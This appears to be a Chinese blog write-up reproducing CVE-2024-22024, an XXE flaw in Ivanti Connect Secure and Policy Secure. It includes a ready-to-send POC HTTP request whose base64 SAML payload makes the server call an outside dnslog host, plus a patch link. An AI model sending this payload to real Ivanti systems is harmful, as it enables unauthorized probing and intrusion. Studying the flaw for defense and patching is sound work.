Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)

admin

107942
文章

90
评论

2024年5月23日14:57:59评论43 views字数 1071阅读3分34秒阅读模式

0x00写在前面

本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！

0x01漏洞介绍

Ivanti Connect Secure和Ivanti Policy Secure都是美国Ivanti公司的产品。Ivanti Connect Secure是安全远程网络连接工具。Ivanti Policy Secure是一个网络访问控制 (NAC) 解决方案。

Ivanti Connect Secure和Ivanti Policy Secure存在代码问题漏洞，该漏洞源于存在XML外部实体注入漏洞，允许攻击者在不知情的情况下访问某些受限资源。

0x02影响版本

Ivanti Connect_Secure 22.4,Ivanti Connect_Secure 9.1,Ivanti Connect_Secure 22.5

Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)

0x03漏洞复现

1.访问漏洞环境

Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)

2.对漏洞进行复现

POC （POT）

漏洞复现

POST /dana-na/auth/saml-sso.cgi HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36Connection: closeContent-Length: 176Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

base64解码

Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)

测试dnslog

Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)

3.nuclei工具测试（漏洞存在）

Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)

0x04修复建议

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US

‍

原文始发于微信公众号（弥天安全实验室）：【成功复现】Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)

左青龙
微信扫一扫

右白虎
微信扫一扫

Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)

Zyxel NAS设备 setCookie 未授权命令注入漏洞

学分制系统 GetCalendarContentById SQL注入漏洞

万户OA-text2html-存在任意文件读取漏洞

Apache Kafka UI 中的远程代码执行（RCE） - CVE-2023-52251、CVE-2024-32030

CVE-2024-28397：js2py（JS 解释器）沙盒逃逸，绕过限制执行命令

锐捷上网行为管理系统 static_convert.php 远程命令执行漏洞 poc

CRMEB电商系统存在SQL注入漏洞【附POC】

Windows核弹级漏洞，Win7-Win11全沦陷(PoC)

Hikvision海康综合安防管理平台applyAutoLoginTicket接口存在远程命令执行漏洞附POC

医药信息管理系统GetLshByTj存在SQL注入漏洞

发表评论

在线咨询

微信